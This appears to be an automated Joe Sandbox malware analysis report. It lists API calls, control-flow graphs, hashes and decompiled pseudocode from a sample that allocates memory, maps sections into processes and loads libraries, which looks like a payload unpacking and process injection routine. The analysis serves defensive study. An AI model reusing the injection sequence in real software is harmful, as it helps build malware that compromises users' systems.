                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                      • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 226003c-2260047 1 226004c-2260263 call 2260a3f call 2260e0f call 2260d90 VirtualAlloc 0->1 2 2260049 0->2 17 2260265-2260289 call 2260a69 1->17 18 226028b-2260292 1->18 2->1 23 22602ce-22603c2 VirtualProtect call 2260cce call 2260ce7 17->23 20 22602a1-22602b0 18->20 22 22602b2-22602cc 20->22 20->23 22->20 29 22603d1-22603e0 23->29 30 22603e2-2260437 call 2260ce7 29->30 31 2260439-22604b8 VirtualFree 29->31 30->29 32 22605f4-22605fe 31->32 33 22604be-22604cd 31->33 37 2260604-226060d 32->37 38 226077f-2260789 32->38 36 22604d3-22604dd 33->36 36->32 40 22604e3-2260505 36->40 37->38 43 2260613-2260637 37->43 41 22607a6-22607b0 38->41 42 226078b-22607a3 38->42 51 2260517-2260520 40->51 52 2260507-2260515 40->52 44 22607b6-22607cb 41->44 45 226086e-22608be LoadLibraryA 41->45 42->41 46 226063e-2260648 43->46 48 22607d2-22607d5 44->48 50 22608c7-22608f9 45->50 46->38 49 226064e-226065a 46->49 53 22607d7-22607e0 48->53 54 2260824-2260833 48->54 49->38 55 2260660-226066a 49->55 56 2260902-226091d 50->56 57 22608fb-2260901 50->57 58 2260526-2260547 51->58 52->58 59 22607e4-2260822 53->59 60 22607e2 53->60 62 2260839-226083c 54->62 61 226067a-2260689 55->61 57->56 63 226054d-2260550 58->63 59->48 60->54 64 2260750-226077a 61->64 65 226068f-22606b2 61->65 62->45 66 226083e-2260847 62->66 68 2260556-226056b 63->68 69 22605e0-22605ef 63->69 64->46 70 22606b4-22606ed 65->70 71 22606ef-22606fc 65->71 72 226084b-226086c 66->72 73 2260849 66->73 76 226056f-226057a 68->76 77 226056d 68->77 69->36 70->71 74 22606fe-2260748 71->74 75 226074b 71->75 72->62 73->45 74->75 75->61 80 226057c-2260599 76->80 81 226059b-22605bb 76->81 77->69 84 22605bd-22605db 80->84 81->84 84->63
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0226024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: f0866a4a534265b635c4f48f5103a6679655d60997b2cb50cb092b7cbc6e10b9
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: 60527975A11229DFDB64CF98C984BACBBB1BF09304F1480D9E90DAB355DB30AA85DF14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 358 2260e0f-2260e24 SetErrorMode * 2 359 2260e26 358->359 360 2260e2b-2260e2c 358->360 359->360
                      APIs
                      • SetErrorMode.KERNELBASE(00000400,?,?,02260223,?,?), ref: 02260E19
                      • SetErrorMode.KERNELBASE(00000000,?,?,02260223,?,?), ref: 02260E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 01df04ff48ef7195399de051aa7a3bf3c448f718d79b6c25c3f555e1db7778fa
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: F4D0123255512877D7002AD4DC0DBDD7B1CDF09B66F008011FB0DD9080C770964046E5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 361 40e703-40e712 363 40e714-40e717 361->363 364 40e718-40e71b 361->364 365 40e72b-40e734 call 4111b8 364->365 366 40e71d-40e722 364->366 369 40e739-40e73e 365->369 366->366 367 40e724-40e729 366->367 367->365 367->366 370 40e740-40e74c 369->370 371 40e74d-40e758 369->371 371->370
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __malloc_crt
                      • String ID:
                      • API String ID: 3464615804-0
                      • Opcode ID: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction ID: fc55ce3b648994ae0669cb83a6c03f413a82d86dd79d98679187b4526597e74b
                      • Opcode Fuzzy Hash: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction Fuzzy Hash: 92F09E339001205DD720773A3C048770629DAC63693150C3BF692E3281F6380C8342E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 374 40e7ac-40e7ce HeapCreate 375 40e7d0-40e7d1 374->375 376 40e7d2-40e7db 374->376
                      APIs
                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040E7C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction ID: cc9ea7525e2f4401f88430c5405be3d1bc70efe095c2ac504a773410bf562ff0
                      • Opcode Fuzzy Hash: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction Fuzzy Hash: 96D05E369583445EEB105FB56D087623BDCD784795F049436B90CDA6A0E674C650DA44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 377 40a0cd-40a0cf call 40a05b 379 40a0d4-40a0d5 377->379
                      APIs
                      • __encode_pointer.LIBCMT ref: 0040A0CF
                        • Part of subcall function 0040A05B: RtlEncodePointer.NTDLL(?), ref: 0040A0C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: EncodePointer__encode_pointer
                      • String ID:
                      • API String ID: 4150071819-0
                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction ID: 50ed121f21e01714d4d4106e0456cc313bcbcd0e045e12985174d0a2d6778b00
                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 380 401869-4018bd call 40119e Sleep call 4013d8 391 4018cc-401907 call 40119e 380->391 392 4018bf-4018c7 call 4014a8 380->392 392->391
                      C-Code - Quality: 62%
                      			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __edi;
                      				void* __ebp;
                      				intOrPtr _t8;
                      				void* _t11;
                      				intOrPtr _t13;
                      				intOrPtr* _t16;
                      				signed char _t19;
                      				void* _t20;
                      				intOrPtr* _t21;
                      				intOrPtr* _t22;
                      
                      				_t24 = __eflags;
                      				_push(0x18a0);
                      				_t8 =  *_t21;
                      				_t22 = _t21 + 4;
                      				L0040119E(_t8, 0x63, _t20, __eflags);
                      				_t16 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
                      				_t25 = _t11;
                      				if(_t11 != 0) {
                      					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
                      				}
                      				 *_t16(0xffffffff, 0);
                      				_push(0x18a0);
                      				_t13 =  *_t22;
                      				return L0040119E(_t13, 0x63, _t20, _t25);
                      			}















                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                      • Opcode Fuzzy Hash: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 403 40188b-4018bd call 40119e Sleep call 4013d8 410 4018cc-401907 call 40119e 403->410 411 4018bf-4018c7 call 4014a8 403->411 411->410
                      C-Code - Quality: 62%
                      			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
                      				void* _t13;
                      				intOrPtr _t15;
                      				intOrPtr* _t19;
                      				signed char _t24;
                      				void* _t28;
                      				intOrPtr* _t30;
                      
                      				_t33 = __eflags;
                      				_t25 = __edi;
                      				asm("out 0xdc, al");
                      				_t24 = __eax;
                      				L0040119E(__edx, 0x63, __edi, __eflags);
                      				_t19 =  *((intOrPtr*)(_t28 + 8));
                      				Sleep(0x1388);
                      				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
                      				_t34 = _t13;
                      				if(_t13 != 0) {
                      					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
                      				}
                      				 *_t19(0xffffffff, 0);
                      				_push(0x18a0);
                      				_t15 =  *_t30;
                      				return L0040119E(_t15, 0x63, _t25, _t34);
                      			}










                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                      • Opcode Fuzzy Hash: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 422 40189a-4018bd call 40119e Sleep call 4013d8 428 4018cc-401907 call 40119e 422->428 429 4018bf-4018c7 call 4014a8 422->429 429->428
                      C-Code - Quality: 61%
                      			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr _t13;
                      				intOrPtr* _t17;
                      				signed char _t21;
                      				void* _t25;
                      				intOrPtr* _t27;
                      
                      				_t30 = __eflags;
                      				_t22 = __edi;
                      				_pop(ds);
                      				L0040119E(_t8, __ecx, __edi, __eflags);
                      				_t17 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				_t31 = _t11;
                      				if(_t11 != 0) {
                      					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                      				}
                      				 *_t17(0xffffffff, 0);
                      				_push(0x18a0);
                      				_t13 =  *_t27;
                      				return L0040119E(_t13, 0x63, _t22, _t31);
                      			}











                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction ID: fa21e6fe5ec55b494b8a61ead8be6eb3dfa9bfc2d8f44280934193d3a60a32fd
                      • Opcode Fuzzy Hash: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction Fuzzy Hash: B3F01D37604205EBDB00BA95DC819AE3769AF04315F20843BBA12B90E1C6398B12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: 46277bdeb2be833d4433bb61865e73492ba3e9ff6cef753ff34ece147b5d36ee
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: 7B3169B6911609CFDB20CF99C884BAEBBF6FF08724F14414AD441A7354D7B1EA85CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 681948f4b44aad910003ea51e67e7b20d06f6bcaff8d8bd52ab243d27cab3719
                      • Instruction ID: 653d4cf6b362dfff8c83f4e52f89d4d6250ec1a3e5e41aeb24e209779b57a096
                      • Opcode Fuzzy Hash: 681948f4b44aad910003ea51e67e7b20d06f6bcaff8d8bd52ab243d27cab3719
                      • Instruction Fuzzy Hash: 9111EF7556852491C7054F7848418B93750EB81B22B244F7FD6667F9F7D53E4C0B018E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e9c0b18502b7877294d0637dd51c8d88a75d9fefc69f981c69ac4f91e035b6e
                      • Instruction ID: 2bf5da122e206d8ddea150ce4759aa9c6fef35af7899c6b3136442ef59938823
                      • Opcode Fuzzy Hash: 3e9c0b18502b7877294d0637dd51c8d88a75d9fefc69f981c69ac4f91e035b6e
                      • Instruction Fuzzy Hash: FE01C93912982481C7164FB488418B93B50EB81B227648F7FC2267F9F7C93E480B018D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 56e4338ff2a01af046ba09faa78791089a11defd98368a97d240bb0c019029fc
                      • Instruction ID: 175fb33aec9134541b5c724c5eedd2ecf262b4b3a324df48efc7d2c36117c159
                      • Opcode Fuzzy Hash: 56e4338ff2a01af046ba09faa78791089a11defd98368a97d240bb0c019029fc
                      • Instruction Fuzzy Hash: 6801BD7956991540C7154FB448408EA3B50EB92B327648FBFC1657F5F7CA7B480F4188
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02871fd24046ce741f2c7ac25ca5dd483e841f235b0f7f0e7175559287c1a96c
                      • Instruction ID: 0fc6c2734a9ed7443d23c078d571d2afc40337617d3eeb8826db586896f955e1
                      • Opcode Fuzzy Hash: 02871fd24046ce741f2c7ac25ca5dd483e841f235b0f7f0e7175559287c1a96c
                      • Instruction Fuzzy Hash: 4501DC7956996541CB155FB848408EA3B50EB82B323584F7FC1657F9FBCA3A4C0E0188
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: 371a13851f7bc2430136147e6f126d967e8cbc76b975b0e557f27e01474f70d8
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: 6B01F7736206008FDF21CFA0C808FBE33E9FB86205F0541A4E90797285E370AA818B80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0040A836
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040A847
                      • __getptd.LIBCMT ref: 0040A855
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: MOC$csm
                      • API String ID: 803148776-1389381023
                      • Opcode ID: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction ID: db0c76aa7c4e0e0626e6bed2eef3fec0a3783135ff2f5cf4364eea1cffeb3cee
                      • Opcode Fuzzy Hash: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction Fuzzy Hash: 6EE012325103048FD710AAA5C4457563394FB54318F6945B6A808D7393C73CEC615687
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __fileno__flsbuf__flush__locking
                      • String ID:
                      • API String ID: 2259706978-0
                      • Opcode ID: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction ID: 7db9d4361589b3ed1bd66184b58abc72e1ff8a651a3b30b1fe564f823639e331
                      • Opcode Fuzzy Hash: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction Fuzzy Hash: D5419031E00604DBDB249FE988C059FB7B6AF80320F24877FE815A66D1D778DE419B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                      • String ID:
                      • API String ID: 1628550938-0
                      • Opcode ID: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction ID: 90b4e4d6a6b9f7267b9c86ff23d96e3d4ca3ffa8321baab54594e45d1f43a617
                      • Opcode Fuzzy Hash: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction Fuzzy Hash: DF115171540701DFD710AF7A9905B9ABBE0AF04314F10457FE499B62E1CBB89A40CB5D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0040AAFF
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AB0D
                      • __getptd.LIBCMT ref: 0040AB1B
                      • __getptd.LIBCMT ref: 0040AB26
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC10
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID:
                      • API String ID: 803148776-0
                      • Opcode ID: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction ID: 4ceb4badccefb88abe74292121835467509f31c118642c149aaa2b759065458d
                      • Opcode Fuzzy Hash: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction Fuzzy Hash: 9911DAB1C00309DFDB00EFA5D845ADE7BB1FF04318F10856AF854A7292DB789A519F59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0041035B
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 00410372
                      • __amsg_exit.LIBCMT ref: 00410380
                      • __lock.LIBCMT ref: 00410390
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                      • String ID:
                      • API String ID: 3521780317-0
                      • Opcode ID: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction ID: 078b7b1b4c449bd8eee7397e22a660bfcf81d1e5f576ffd6547d9eee0cff7ad2
                      • Opcode Fuzzy Hash: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction Fuzzy Hash: 17F0FF31A407189BD730FBA6940279E73A0AB04718F50466FAC94A72D2CBBC59C1DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AC10
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: csm
                      • API String ID: 803148776-1018135373
                      • Opcode ID: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction ID: bffc41321c1a3a0fb5d007abf3a1080087ced7d40673d35ab145433e29951c07
                      • Opcode Fuzzy Hash: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction Fuzzy Hash: B90128348043058BEF38DF65D4886AEB3B5AF10315FAA453FE481766D1CB3889A1CB0B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:3.2%
                      Dynamic/Decrypted Code Coverage:14.5%
                      Signature Coverage:0%
                      Total number of Nodes:491
                      Total number of Limit Nodes:11

                      Control-flow Graph

                      • Executed
                      • Not Executed
